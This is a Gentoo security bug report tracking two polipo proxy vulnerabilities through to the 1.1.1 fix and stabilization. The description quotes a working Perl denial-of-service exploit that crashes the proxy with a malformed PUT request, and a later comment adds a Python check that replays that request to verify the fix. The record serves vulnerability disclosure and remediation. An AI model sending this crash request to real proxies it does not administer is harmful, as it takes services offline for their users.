Bug 385307 (CVE-2011-3596) - <net-proxy/polipo-1.1.1: multiple vulnerabilities (CVE-{2009-3305,2011-3596})
Summary: <net-proxy/polipo-1.1.1: multiple vulnerabilities (CVE-{2009-3305,2011-3596})
Status: RESOLVED FIXED
Alias: CVE-2011-3596
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: Normal minor
Assignee: Gentoo Security
URL: http://seclists.org/fulldisclosure/20...
Whiteboard: B3 [noglsa]
Keywords:
Depends on:
Blocks:
 
Reported: 2011-10-02 03:53 UTC by Tim Sammut (RETIRED)
Modified: 2015-11-09 22:05 UTC

See Also:
Package list:
Runtime testing required: ---


Description Tim Sammut (RETIRED) gentoo-dev 2011-10-02 03:53:01 UTC
From the Full-Disclosure posting at $URL:

# Exploit Title: [POLIPO 1.0.4.1 Denial Of Service]
# Date: [10/05/10]
# Author: [Usman Saeed]
# Software Link:[http://www.pps.jussieu.fr/~jch/software/polipo/]
# Version: [1.0.4.1]
# Tested on: [Windows 7 Home]
# CVE : [if exists]
# Code : [exploit code]



Disclaimer: [This code is for Educational Purposes , I would Not be
responsible for any misuse of this code]

[*] Download Page :http://www.pps.jussieu.fr/~jch/software/polipo/


[*] Attack type : Remote


[*] Patch Status : Unpatched



[*] Description  : By sending a crafted POST/PUT request to the server, the proxy server crashes!



[*] Exploitation :


#!/usr/bin/perl
# POLIPO 1.0.4.1 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [30/09/11]

$host = $ARGV[0];
$PORT = $ARGV[1];


$evil = "PUT / HTTP/1.1\r\n".
"Content-Length:1\r\n\r\n";


use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";
exit;
}


$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr  => $host ,
PeerPort  => $PORT) || die "Cant connect to $host!";
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";
print "\n";

print "[*] Initializing\n";

sleep(2);

print "[*] Sendin evil Packet Buhahahahaha \n";

send ($sock , $evil , 0);
print "[*] Crashed :) \n";
$res = recv($sock,$response,1024,0);
print $response;



exit;


-- 
Usman Saeed
Blog : http://www.xc0re.net/blog
Twitter : http://twitter.com/xc0resecurity
Facebook : https://www.facebook.com/pages/Xc0re-Security-Reseach-Group/168397916536539
Comment 1 Andrew Savchenko gentoo-dev 2015-01-09 00:29:16 UTC
Hello,

polipo-1.1.1 is in tree now. It should fix CVE-2011-3596, from CHANGES file:

  * Fail expectations on the local interface.  This might or might not be
    what CVE-2011-3596 is about, difficult to say since nobody is speaking
    to me.

So upstream is not 100% sure, but at least the exploit from comment 1 doesn't work anymore: polipo bails out with "405 Method not allowed".

Please note that 1.1.1 also fixes CVE-2009-3305:

  * Fixed a crash that occurs when a server sends a malformed
    Cache-Control: header (CVE-2009-3305). Thanks to Stefan Fritsch.

Vulnerable unstable version is removed. So what is left is to stabilize polipo-1.1.1 and remove old stable.
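As an added fix-verification check (example code, not from the bug report, the PoC author or polipo): it replays the PUT request from the description against a proxy you administer and reports whether the reply is the "405 Method not allowed" that comment 1 describes for polipo-1.1.1, or nothing at all, which is the old crash symptom. The host and port arguments and the 127.0.0.1:8123 default are assumptions.

```python
"""Regression check for the polipo PUT-without-body crash (CVE-2011-3596).

Added example, not code from the bug report, the PoC author or polipo. It
sends the PoC's request to a proxy you administer and classifies the reply.
Host/port are assumptions; 127.0.0.1:8123 is polipo's conventional default.
"""
import socket

# Byte-for-byte the request from the PoC in the description:
# a PUT announcing a one-byte body that is never sent.
PROBE = b"PUT / HTTP/1.1\r\nContent-Length:1\r\n\r\n"


def classify(raw: bytes) -> str:
    """Turn the proxy's raw reply into a verdict:
    'fixed'    - HTTP 405, the request was refused cleanly (polipo-1.1.1)
    'other'    - some other HTTP status came back
    'no_reply' - nothing came back, the connection was dropped (crash symptom)
    'garbage'  - bytes came back that are not an HTTP status line"""
    if not raw:
        return "no_reply"
    parts = raw.split(b"\r\n", 1)[0].split(b" ", 2)
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/") or not parts[1].isdigit():
        return "garbage"
    return "fixed" if parts[1] == b"405" else "other"


def check_proxy(host: str = "127.0.0.1", port: int = 8123, timeout: float = 5.0) -> str:
    """Send PROBE and classify whatever the proxy answers within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(PROBE)
            received = b""
            try:
                # Read until the status line is complete or the peer closes.
                while b"\r\n" not in received:
                    chunk = sock.recv(1024)
                    if not chunk:
                        break
                    received += chunk
            except socket.timeout:
                pass
            return classify(received)
    except OSError as exc:
        # A proxy that just crashed resets or refuses; so does one that was
        # never listening, so the exception name is reported for the operator.
        return f"no_reply ({type(exc).__name__})"
```

Call `check_proxy(host, port)` against a test instance; any verdict other than `fixed` means the proxy either still needs the upgrade or behaves differently from what comment 1 reports.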
Comment 2 Justin Lecher (RETIRED) gentoo-dev 2015-01-09 08:05:33 UTC
(In reply to Andrew Savchenko from comment #1)
> Vulnerable unstable version is removed. So what is left is to stabilize
> polipo-1.1.1 and remove old stable.

Please add arches in CC and tell them which version to stabilize. Also change the title of the bug to reflect which versions are affected.
Comment 3 Andrew Savchenko gentoo-dev 2015-01-09 14:05:47 UTC
Arch teams, please stabilize =net-proxy/polipo-1.1.1.
Comment 4 Andreas Schürch gentoo-dev 2015-01-11 14:13:10 UTC
x86 done.
Comment 5 Agostino Sarubbo gentoo-dev 2015-01-12 10:38:13 UTC
amd64 stable.

Maintainer(s), please cleanup.
Security, please vote.
Comment 6 Andrew Savchenko gentoo-dev 2015-01-12 16:17:33 UTC
All vulnerable versions are removed from tree.
Comment 7 Kristian Fiskerstrand (RETIRED) gentoo-dev 2015-10-31 16:25:44 UTC
GLSA Vote: No
Comment 8 Stefan Behte (RETIRED) gentoo-dev Security 2015-11-09 22:05:20 UTC
Vote: NO.